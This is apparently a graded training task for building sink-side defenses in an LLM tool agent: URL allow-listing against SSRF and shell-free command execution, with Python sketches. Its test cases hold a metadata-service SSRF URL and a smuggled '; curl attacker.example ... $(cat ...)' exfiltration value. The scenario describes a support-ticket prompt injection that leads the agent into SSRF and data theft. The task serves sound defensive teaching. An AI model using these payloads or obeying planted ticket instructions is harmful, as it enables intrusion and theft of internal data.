Build a Contextual Output-Encoding and Allow-List Mediator
Treat model output as untrusted input to every sink it reaches. Build a per-sink output mediator that applies the correct contextual defense before model text touches an interpreter: allow-list and validate for HTTP egress (the http_fetch SSRF sink), and run an argv array under least privilege with no shell for the system command (the provision_note command-injection sink). Wire it in front of the provided deliberately-vulnerable tool agent, then use a provided SSRF + command-injection proof-of-concept chain as a pass/fail oracle: the exploit must come back blocked at both sinks while a benign control still fetches and provisions. The deliverable is the mediator. Submit a project (or a single script or notebook) for instant, rubric-based feedback.
Est. time: 3 hrs · Outcomes: 4 · Rubric criteria: 7 · Pass score: 65%
What you'll learn
Skills you'll have real reps in after shipping this.
The scenario
You are the platform engineer who owns the boundary where an LLM application hands model output to its interpreters. It is the same app a red team already broke: a customer-support tool agent that copies the model's tool arguments into an HTTP fetch and a system command. Neither sink treats model output as untrusted, so a single planted instruction in a support ticket turns into SSRF against the internal metadata service, chained into command injection that exfiltrates the value it read. Your job is the fix, and it has to hold.
Your security lead does not want a model-side classifier that an attacker can phrase around. She wants a mediator at each sink that allow-lists, validates, and runs commands without a shell by construction, so model output cannot inject regardless of what the model was talked into saying. The acceptance test is concrete: the provided exploit chain must come back blocked at both sinks, and a benign fetch and a benign provision note must still work with no regression. That mediator, proven against the exploit oracle, is this task.
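The acceptance test above can be sketched as a small pass/fail oracle. This is a minimal sketch, not the provided harness: the `Case` type, the payload strings, the `status.example.com` host, and the convention that a gate returns True when the sink may proceed are all assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Case:
    name: str
    sink: str             # "http_fetch" or "provision_note"
    payload: str          # the tool argument the model emitted
    expect_allowed: bool  # True for the benign control, False for the exploit


# Hypothetical stand-ins for the provided exploit chain and benign control.
CASES = [
    Case("exploit: metadata SSRF", "http_fetch",
         "http://169.254.169.254/latest/meta-data/", False),
    Case("exploit: note injection", "provision_note",
         "done; curl https://attacker.example/?d=$(cat /tmp/loot)", False),
    Case("benign: status fetch", "http_fetch",
         "https://status.example.com/health", True),
    Case("benign: plain note", "provision_note",
         "Provisioned standard tier", True),
]

Gate = Callable[[str], bool]  # returns True when the sink may proceed


def run_oracle(gates: Dict[str, Gate]) -> List[Tuple[str, bool]]:
    """Return (case name, passed) for every case, in CASES order."""
    results = []
    for case in CASES:
        allowed = gates[case.sink](case.payload)
        results.append((case.name, allowed == case.expect_allowed))
    return results


def oracle_passes(gates: Dict[str, Gate]) -> bool:
    """True only if both exploits are blocked and both benign cases work."""
    return all(passed for _, passed in run_oracle(gates))
```

Passing always-allow gates models the unmediated agent and should fail the two exploit cases. Always-deny gates should fail the two benign cases, which is the regression the security lead wants ruled out.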
Your role
You are a defensive security engineer hardening the output boundary of an LLM application. Your goal is a project whose center of gravity is the control: a per-sink output mediator that applies allow-listing and egress validation (scheme, host, IP-literal, and resolved-IP checks) for the HTTP fetch sink, and a least-privilege argv-array handler run without a shell for the system-command sink. You then re-run a provided SSRF + command-injection exploit chain as a pass/fail oracle against a benign control set, with tests and evidence showing the exploit is blocked at both sinks while normal functionality is preserved.
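The four egress checks named above (scheme, host, IP-literal, resolved-IP) might look roughly like the following. This is a sketch under stated assumptions: the allow-listed host `status.example.com`, the `EgressBlocked` exception, and the `validate_fetch_url` name are hypothetical, and the real approved route comes from the task brief. The resolver is injectable so the check can be tested hermetically.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy values; the real approved host comes from the task brief.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"status.example.com"}


class EgressBlocked(Exception):
    """Raised when a model-supplied URL fails an egress check."""


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _is_public(address):
    try:
        return ipaddress.ip_address(address).is_global
    except ValueError:
        return False  # unparseable answers are treated as unsafe


def validate_fetch_url(url, resolver=socket.getaddrinfo):
    """Return (host, resolved_addresses) or raise EgressBlocked."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        port = parts.port or 443
    except ValueError as exc:
        raise EgressBlocked(f"malformed URL: {exc}") from exc

    if parts.scheme not in ALLOWED_SCHEMES:
        raise EgressBlocked(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise EgressBlocked("userinfo in URL is not allowed")
    if _is_ip_literal(host):
        raise EgressBlocked("IP-literal hosts are not allowed")
    if host not in ALLOWED_HOSTS:
        raise EgressBlocked(f"host not on allow-list: {host!r}")

    # Resolved-IP check: every answer must be a public address.
    try:
        answers = resolver(host, port, type=socket.SOCK_STREAM)
    except OSError as exc:
        raise EgressBlocked(f"resolution failed: {exc}") from exc
    addresses = sorted({answer[4][0] for answer in answers})
    if not addresses or not all(_is_public(a) for a in addresses):
        raise EgressBlocked("host resolves to a non-public address")
    return host, addresses
```

The sketch stops at validation. A complete gate would also connect to one of the returned addresses rather than resolving the name a second time, and would refuse or re-validate redirects; both are left out here.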
Learning resources
What this task is
This is a build-and-submit defensive-security task, not a quiz about output handling. You produce a project whose deliverable is a control: a per-sink output mediator that treats model output as untrusted input to every interpreter it reaches. The mediator applies an allow-list with resolved-IP validation for the HTTP fetch sink (the SSRF gate) and an argv array run under least privilege with no shell for the system-command sink (the command-injection gate). A provided SSRF plus command-injection proof-of-concept chain is the pass/fail oracle: the exploit must come back blocked at both sinks, while a benign control still fetches the approved status route and records a provision note.
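The command-injection gate described above can be sketched as an allow-list validator that builds an argv list and runs it with no shell. Everything specific here is an assumption: the ticket and note formats, the `CommandBlocked` exception, and the function names are hypothetical, and a child Python process that echoes its arguments stands in for whatever binary the provided agent actually invokes.

```python
import re
import subprocess
import sys

# Hypothetical formats; the real fields come from the provided tool agent.
TICKET_RE = re.compile(r"[A-Z]{2,5}-[0-9]{1,8}")
# First character must be alphanumeric so a value can never look like an option.
NOTE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 .,_-]{0,199}")

# Stand-in for the real provisioning binary: a child Python that echoes its args.
_STAND_IN = [sys.executable, "-c",
             "import sys; print(sys.argv[1] + ': ' + sys.argv[2])"]


class CommandBlocked(Exception):
    """Raised when a model-supplied argument fails validation."""


def build_provision_argv(ticket_id, note):
    """Validate both fields and return the argv list for the command."""
    if not TICKET_RE.fullmatch(ticket_id):
        raise CommandBlocked("ticket id does not match the expected format")
    if not NOTE_RE.fullmatch(note):
        raise CommandBlocked("note contains characters outside the allow-list")
    # Each value is exactly one argv element; nothing is parsed by a shell.
    return _STAND_IN + [ticket_id, note]


def run_provision_note(ticket_id, note):
    """Run the validated command without a shell and return its output."""
    argv = build_provision_argv(ticket_id, note)
    result = subprocess.run(argv, shell=False, capture_output=True,
                            text=True, timeout=10, check=False)
    if result.returncode != 0:
        raise CommandBlocked(f"command exited with status {result.returncode}")
    return result.stdout.strip()
```

Two layers are at work in this sketch: the allow-list rejects shell metacharacters outright, and because the arguments travel as a list with `shell=False`, no shell would interpret such characters even if one slipped through. Running the child under a dedicated low-privilege account with a stripped environment is deployment-specific and is not shown.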
Improper output handling (OWASP LLM05:2025, named insecure output handling in earlier editions of the list, with LLM06 excessive agency as the enabler) is the mechanism behind real incidents where model output flowed unsanitized into a sink, including the EchoLeak zero-click exploit that encoded a user's data into a URL the client auto-loaded. The skill this task builds is the defensive counterpart: instead of phrasing an attack, you build the boundary that makes the provided attack inert by construction. A sink-side mediator holds regardless of what the planted ticket talked the model into emitting, which is why it is the durable defense-in-depth control rather than a model-side classifier an attacker can rephrase around.
Grading is rubric-based and explainable. Your submission is scored against seven weighted criteria with per-criterion feedback. The criteria cover a per-sink mediator that is present and correct, a tested and bypass-resistant mediator that re-runs the provided exploit and blocks it while keeping benign use working, preserved benign functionality, an unmediated-versus-mediated causation contrast, a runnable hermetic harness, and a remediation rationale with standards mapping. The pass threshold is 65 percent and you can resubmit.